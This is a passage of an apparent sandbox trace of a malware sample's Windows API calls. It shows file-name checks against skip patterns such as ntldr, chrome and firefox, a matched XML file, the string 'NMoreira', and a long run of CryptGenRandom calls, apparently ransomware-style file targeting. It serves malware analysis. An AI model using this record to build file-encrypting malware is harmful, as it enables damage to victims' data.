(pszFile="ipssve.xml", pszSpec="*NTDETECT.COM*") returned 0 [0148.015] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*ntldr*") returned 0 [0148.015] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*chrome*") returned 0 [0148.015] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*opera*") returned 0 [0148.015] PathMatchSpecW (pszFile="ipssve.xml", pszSpec="*firefox*") returned 0 [0148.015] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml", pszSpec="*") returned 1 [0148.015] strlen (_Str="NMoreira") returned 0x8 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.015] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.016] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: 